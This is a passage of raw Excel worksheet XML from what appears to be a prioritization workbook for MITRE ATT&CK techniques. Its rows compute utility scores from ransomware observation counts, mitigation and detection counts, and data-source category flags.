        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B122" s="37">
        <f t="shared" si="1"/>
        <v>191.45249357142856</v>
      </c>
      <c r="C122" s="37" t="s">
        <v>452</v>
      </c>
      <c r="D122" s="50" t="s">
        <v>429</v>
      </c>
      <c r="E122" s="37" t="s">
        <v>453</v>
      </c>
      <c r="F122" s="37">
        <v>1</v>
      </c>
      <c r="G122" s="37">
        <v>1</v>
      </c>
      <c r="H122" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I122" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J122" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K122" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L122" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M122" s="37">
        <v>0</v>
      </c>
      <c r="N122" s="56">
        <v>0</v>
      </c>
      <c r="O122" s="56">
        <v>2</v>
      </c>
      <c r="P122" s="56">
        <v>2</v>
      </c>
      <c r="Q122" s="56">
        <v>0</v>
      </c>
      <c r="R122" s="57" t="s">
        <v>454</v>
      </c>
      <c r="S122" s="57">
        <v>15</v>
      </c>
      <c r="T122" s="57" t="s">
        <v>455</v>
      </c>
      <c r="U122" s="57">
        <v>15</v>
      </c>
      <c r="V122" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.30476214285714287</v>
      </c>
      <c r="W122" s="37">
        <v>30</v>
      </c>
      <c r="X122" s="37">
        <v>0.54545500000000002</v>
      </c>
      <c r="Y122" s="37">
        <v>0.54545500000000002</v>
      </c>
      <c r="Z122" s="37">
        <v>4</v>
      </c>
      <c r="AA122" s="37">
        <v>0.04</v>
      </c>
      <c r="AB122" s="37">
        <v>0.04</v>
      </c>
      <c r="AC122" s="37"/>
      <c r="AD122" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE122" s="37" t="str" cm="1">
        <f t="array" ref="AE122">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD122)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF122" s="37">
        <v>118</v>
      </c>
      <c r="AG122" s="37" t="str" cm="1">
        <f t="array" ref="AG122">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD122)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH122" s="37">
        <v>118</v>
      </c>
      <c r="AI122" s="37" t="str" cm="1">
        <f t="array" ref="AI122">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD122)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ122" s="37">
        <v>118</v>
      </c>
      <c r="AK122" s="37" t="str" cm="1">
        <f t="array" ref="AK122">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD122)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL122" s="37">
        <v>118</v>
      </c>
      <c r="AM122" s="37" t="str" cm="1">
        <f t="array" ref="AM122">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD122)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN122" s="37">
        <v>0</v>
      </c>
      <c r="AO122" s="37">
        <v>2</v>
      </c>
      <c r="AP122" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ122" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>63.817497857142854</v>
      </c>
      <c r="AR122" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS122" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT122" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU12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3.0865475170068026</v>
      </c>
    </row>
    <row r="123" spans="1:47" ht="51">
      <c r="A123" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B123" s="37">
        <f t="shared" si="1"/>
        <v>211.24278900000002</v>
      </c>
      <c r="C123" s="37" t="s">
        <v>456</v>
      </c>
      <c r="D123" s="50" t="s">
        <v>429</v>
      </c>
      <c r="E123" s="37" t="s">
        <v>457</v>
      </c>
      <c r="F123" s="37">
        <v>1</v>
      </c>
      <c r="G123" s="37">
        <v>1</v>
      </c>
      <c r="H123" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I123" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J123" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K123" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L123" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M123" s="37">
        <v>0</v>
      </c>
      <c r="N123" s="56">
        <v>0</v>
      </c>
      <c r="O123" s="56">
        <v>13</v>
      </c>
      <c r="P123" s="56">
        <v>3</v>
      </c>
      <c r="Q123" s="56">
        <v>4</v>
      </c>
      <c r="R123" s="57" t="s">
        <v>458</v>
      </c>
      <c r="S123" s="57">
        <v>10</v>
      </c>
      <c r="T123" s="57" t="s">
        <v>459</v>
      </c>
      <c r="U123" s="57">
        <v>16</v>
      </c>
      <c r="V123" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.34285700000000002</v>
      </c>
      <c r="W123" s="37">
        <v>26</v>
      </c>
      <c r="X123" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Y123" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Z123" s="37">
        <v>20</v>
      </c>
      <c r="AA123" s="37">
        <v>0.2</v>
      </c>
      <c r="AB123" s="37">
        <v>0.2</v>
      </c>
      <c r="AC123" s="37"/>
      <c r="AD123" s="50" t="s">
        <v>451</v>
      </c>
      <c r="AE123" s="37" t="str" cm="1">
        <f t="array" ref="AE123">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD123)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF123" s="37">
        <v>119</v>
      </c>
      <c r="AG123" s="37" t="str" cm="1">
        <f t="array" ref="AG123">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD123)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH123" s="37">
        <v>119</v>
      </c>
      <c r="AI123" s="37" t="str" cm="1">
        <f t="array" ref="AI123">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD123)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ123" s="37">
        <v>119</v>
      </c>
      <c r="AK123" s="37" t="str" cm="1">
        <f t="array" ref="AK123">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD123)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL123" s="37">
        <v>119</v>
      </c>
      <c r="AM123" s="37" t="str" cm="1">
        <f t="array" ref="AM123">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD123)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN123" s="37">
        <v>0</v>
      </c>
      <c r="AO123" s="37">
        <v>2</v>
      </c>
      <c r="AP123" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ123" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>70.414263000000005</v>
      </c>
      <c r="AR123" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS123" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT123" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU12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3.4006791904761902</v>
      </c>
    </row>
    <row r="124" spans="1:47" ht="34">
      <c r="A124" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B124" s="37">
        <f t="shared" si="1"/>
        <v>162.62369500000003</v>
      </c>
      <c r="C124" s="37" t="s">
        <v>460</v>
      </c>
      <c r="D124" s="50" t="s">
        <v>429</v>
      </c>
      <c r="E124" s="37" t="s">
        <v>461</v>
      </c>
      <c r="F124" s="37">
        <v>1</v>
      </c>
      <c r="G124" s="37">
        <v>1</v>
      </c>
      <c r="H124" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I124" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J124" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K124" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L124" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M124" s="37">
        <v>0</v>
      </c>
      <c r="N124" s="56">
        <v>0</v>
      </c>
      <c r="O124" s="56">
        <v>0</v>
      </c>
      <c r="P124" s="56">
        <v>0</v>
      </c>
      <c r="Q124" s="56">
        <v>0</v>
      </c>
      <c r="R124" s="57" t="s">
        <v>462</v>
      </c>
      <c r="S124" s="57">
        <v>10</v>
      </c>
      <c r="T124" s="57" t="s">
        <v>463</v>
      </c>
      <c r="U124" s="57">
        <v>15</v>
      </c>
      <c r="V124" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.238095</v>
      </c>
      <c r="W124" s="37">
        <v>25</v>
      </c>
      <c r="X124" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y124" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z124" s="37">
        <v>0</v>
      </c>
      <c r="AA124" s="37">
        <v>0</v>
      </c>
      <c r="AB124" s="37">
        <v>0</v>
      </c>
      <c r="AC124" s="37"/>
      <c r="AD124" s="50" t="s">
        <v>111</v>
      </c>
      <c r="AE124" s="37" t="str" cm="1">
        <f t="array" ref="AE124">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD124)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF124" s="37">
        <v>120</v>
      </c>
      <c r="AG124" s="37" t="str" cm="1">
        <f t="array" ref="AG124">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD124)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH124" s="37">
        <v>120</v>
      </c>
      <c r="AI124" s="37" t="str" cm="1">
        <f t="array" ref="AI124">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD124)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ124" s="37">
        <v>120</v>
      </c>
      <c r="AK124" s="37" t="str" cm="1">
        <f t="array" ref="AK124">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD124)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL124" s="37">
        <v>120</v>
      </c>
      <c r="AM124" s="37" t="str" cm="1">
        <f t="array" ref="AM124">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD124)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN124" s="37">
        <v>0</v>
      </c>
      <c r="AO124" s="37">
        <v>0</v>
      </c>
      <c r="AP124" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ124" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>54.20789833333334</v>
      </c>
      <c r="AR124" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS124" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT124" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU12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25" spans="1:47" ht="34">
      <c r="A125" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B125" s="37">
        <f t="shared" si="1"/>
        <v>48.5</v>
      </c>
      <c r="C125" s="37" t="s">
        <v>3787</v>
      </c>
      <c r="D125" s="50" t="s">
        <v>429</v>
      </c>
      <c r="E125" s="37" t="s">
        <v>3788</v>
      </c>
      <c r="F125" s="37">
        <v>1</v>
      </c>
      <c r="G125" s="37">
        <v>1</v>
      </c>
      <c r="H125" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I125" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J125" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K125" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L125" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M125" s="37">
        <v>0</v>
      </c>
      <c r="N125" s="56">
        <v>0</v>
      </c>
      <c r="O125" s="56">
        <v>0</v>
      </c>
      <c r="P125" s="56">
        <v>0</v>
      </c>
      <c r="Q125" s="56">
        <v>0</v>
      </c>
      <c r="R125" s="57"/>
      <c r="S125" s="57"/>
      <c r="T125" s="57"/>
      <c r="U125" s="57"/>
      <c r="V125" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W125" s="37"/>
      <c r="X125" s="37"/>
      <c r="Y125" s="37"/>
      <c r="Z125" s="37"/>
      <c r="AA125" s="37"/>
      <c r="AB125" s="37"/>
      <c r="AC125" s="37"/>
      <c r="AD125" s="50" t="s">
        <v>111</v>
      </c>
      <c r="AE125" s="37" t="str" cm="1">
        <f t="array" ref="AE125">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD125)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF125" s="37">
        <v>121</v>
      </c>
      <c r="AG125" s="37" t="str" cm="1">
        <f t="array" ref="AG125">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD125)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH125" s="37">
        <v>121</v>
      </c>
      <c r="AI125" s="37" t="str" cm="1">
        <f t="array" ref="AI125">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD125)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ125" s="37">
        <v>121</v>
      </c>
      <c r="AK125" s="37" t="str" cm="1">
        <f t="array" ref="AK125">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD125)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL125" s="37">
        <v>121</v>
      </c>
      <c r="AM125" s="37" t="str" cm="1">
        <f t="array" ref="AM125">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD125)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN125" s="37"/>
      <c r="AO125" s="37"/>
      <c r="AP125" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ125" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>16.166666666666668</v>
      </c>
      <c r="AR125" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS125" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT125" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU12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26" spans="1:47" ht="119">
      <c r="A126" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B126" s="37">
        <f t="shared" si="1"/>
        <v>48.900000000000006</v>
      </c>
      <c r="C126" s="37" t="s">
        <v>464</v>
      </c>
      <c r="D126" s="50" t="s">
        <v>465</v>
      </c>
      <c r="E126" s="37"/>
      <c r="F126" s="37">
        <v>1</v>
      </c>
      <c r="G126" s="37">
        <v>1</v>
      </c>
      <c r="H126" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I126" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J126" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K126" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L126" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M126" s="37">
        <v>0</v>
      </c>
      <c r="N126" s="56">
        <v>0</v>
      </c>
      <c r="O126" s="56">
        <v>0</v>
      </c>
      <c r="P126" s="56">
        <v>0</v>
      </c>
      <c r="Q126" s="56">
        <v>0</v>
      </c>
      <c r="R126" s="57"/>
      <c r="S126" s="57">
        <v>0</v>
      </c>
      <c r="T126" s="57"/>
      <c r="U126" s="57">
        <v>0</v>
      </c>
      <c r="V126" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W126" s="37">
        <v>0</v>
      </c>
      <c r="X126" s="37">
        <v>0</v>
      </c>
      <c r="Y126" s="37">
        <v>0</v>
      </c>
      <c r="Z126" s="37">
        <v>0</v>
      </c>
      <c r="AA126" s="37">
        <v>0</v>
      </c>
      <c r="AB126" s="37">
        <v>0</v>
      </c>
      <c r="AC126" s="37" t="s">
        <v>209</v>
      </c>
      <c r="AD126" s="50" t="s">
        <v>466</v>
      </c>
      <c r="AE126" s="37" t="str" cm="1">
        <f t="array" ref="AE126">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD126)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF126" s="37">
        <v>122</v>
      </c>
      <c r="AG126" s="37" t="str" cm="1">
        <f t="array" ref="AG126">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD126)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH126" s="37">
        <v>122</v>
      </c>
      <c r="AI126" s="37" t="str" cm="1">
        <f t="array" ref="AI126">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD126)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ126" s="37">
        <v>122</v>
      </c>
      <c r="AK126" s="37" t="str" cm="1">
        <f t="array" ref="AK126">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD126)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL126" s="37">
        <v>122</v>
      </c>
      <c r="AM126" s="37" t="str" cm="1">
        <f t="array" ref="AM126">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD126)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN126" s="37">
        <v>0</v>
      </c>
      <c r="AO126" s="37"/>
      <c r="AP126" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ126" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>16.3</v>
      </c>
      <c r="AR126" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS126" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT126" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU12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27" spans="1:47" ht="34">
      <c r="A127" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B127" s="37">
        <f t="shared" si="1"/>
        <v>49.300000000000004</v>
      </c>
      <c r="C127" s="37" t="s">
        <v>467</v>
      </c>
      <c r="D127" s="50" t="s">
        <v>468</v>
      </c>
      <c r="E127" s="37"/>
      <c r="F127" s="37">
        <v>1</v>
      </c>
      <c r="G127" s="37">
        <v>1</v>
      </c>
      <c r="H127" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I127" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J127" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K127" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L127" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M127" s="37">
